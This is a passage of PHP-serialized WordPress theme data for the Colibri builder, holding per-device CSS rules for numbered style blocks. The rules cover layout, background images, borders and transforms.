.style-289 h3,#colibri .style-289 h4,#colibri .style-289 h5,#colibri .style-289 h6 {\n font-size: 2.5em;\n}\n\";}i:290;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-290 ol {\n list-style-type: decimal;\n}\n#colibri .style-290 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:291;a:3:{s:7:\"desktop\";s:891:\"#colibri .style-291 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-291 {\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-291 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(-5%);\n}\n\";}i:292;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-292 {\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:293;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-293 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:294;a:3:{s:7:\"desktop\";s:867:\"#colibri .style-294 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster1-scaled-1.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n z-index: 1;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-294 {\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-294 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(5%);\n}\n\";}i:295;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-295 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-295 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n padding-left: 15%;\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-295 {\n text-align: center;\n padding-top: 10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n}\n\";}i:296;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-296 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:298;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-298 ol {\n list-style-type: decimal;\n}\n#colibri .style-298 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:314;a:3:{s:7:\"desktop\";s:159:\"#colibri .style-314 {\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 0px;\n padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:317;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:318;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-318 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:319;a:3:{s:7:\"desktop\";s:279:\"#colibri .style-319 {\n font-family: Baloo;\n font-weight: 400;\n font-size: 20px;\n}\n#colibri .style-319 p {\n font-family: Baloo;\n font-weight: 400;\n font-size: 20px;\n}\n#colibri .style-319 ol {\n list-style-type: decimal;\n}\n#colibri .style-319 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:321;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:322;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-322 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:324;a:3:{s:7:\"desktop\";s:338:\"#colibri .style-324 p,#colibri .style-324 h1,#colibri .style-324 h2,#colibri .style-324 h3,#colibri .style-324 h4,#colibri .style-324 h5,#colibri .style-324 h6 {\n font-weight: 600;\n}\n#colibri .style-324 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:329;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-329 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:330;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-330 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:331;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:333;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-333 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:334;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-334 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:335;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:336;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-336 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:337;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-337 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:338;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:339;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-339 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:340;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-340 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:341;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-341 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-341 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n padding-left: 15%;\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-341 {\n text-align: center;\n padding-top: 10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-left: 0%;\n}\n\";}i:342;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-342 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:344;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-344 ol {\n list-style-type: decimal;\n}\n#colibri .style-344 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:345;a:3:{s:7:\"desktop\";s:844:\"#colibri .style-345 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-ewsimage.png\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-345 {\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-345 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(-5%);\n}\n\";}i:346;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-346 {\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:347;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-347 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:348;a:3:{s:7:\"desktop\";s:897:\"#colibri .style-348 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-position: center center;\n background-size: contain;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast-1.png\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n z-index: 1;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-348 {\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-348 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(5%);\n}\n\";}i:349;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-349 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-349 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n padding-left: 15%;\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-349 {\n text-align: center;\n padding-top: 10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n}\n\";}i:350;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-350 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:352;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-352 ol {\n list-style-type: decimal;\n}\n#colibri .style-352 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:353;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-353 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:354;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-354 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:355;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-355 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-355 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n padding-left: 15%;\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-355 {\n text-align: center;\n padding-top: 10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-left: 0%;\n}\n\";}i:356;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-356 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:358;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-358 ol {\n list-style-type: decimal;\n}\n#colibri .style-358 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:359;a:3:{s:7:\"desktop\";s:899:\"#colibri .style-359 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/raychel-sanner-cswvKS59E90-unsplash-scaled.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-359 {\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-359 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(-5%);\n}\n\";}i:360;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-360 {\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:361;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-361 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:362;a:3:{s:7:\"desktop\";s:887:\"#colibri .style-362 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n z-index: 1;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-362 {\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-362 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(5%);\n}\n\";}i:363;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-363 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-363 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n padding-left: 15%;\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-363 {\n text-align: center;\n padding-top: 10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n}\n\";}i:364;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-364 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:366;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-366 ol {\n list-style-type: decimal;\n}\n#colibri .style-366 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:367;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:368;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:369;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-369 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:370;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:371;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-371 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:372;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-372 ol {\n list-style-type: decimal;\n}\n#colibri .style-372 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:377;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-377 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:378;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:379;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-379 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:380;a:3:{s:7:\"desktop\";s:151:\"#colibri .style-380 {\n text-align: left;\n}\n#colibri .style-380 ol {\n list-style-type: decimal;\n}\n#colibri .style-380 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:381;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-381 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:382;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-382 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:383;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-383 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-383 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n padding-left: 15%;\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-383 {\n text-align: center;\n padding-top: 10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-left: 0%;\n}\n\";}i:384;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-384 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:386;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-386 ol {\n list-style-type: decimal;\n}\n#colibri .style-386 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:387;a:3:{s:7:\"desktop\";s:843:\"#colibri .style-387 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Opherus.png\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-387 {\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-387 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(-5%);\n}\n\";}i:388;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-388 {\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:389;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-389 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:390;a:3:{s:7:\"desktop\";s:874:\"#colibri .style-390 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: 77.72398745397518% 53.316665364481594%;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/Picture1.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n z-index: 1;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:68:\"#colibri .style-390 {\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:167:\"#colibri .style-390 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(5%);\n}\n\";}i:391;a:3:{s:7:\"desktop\";s:707:\"#colibri .style-391 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:155:\"#colibri .style-391 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n 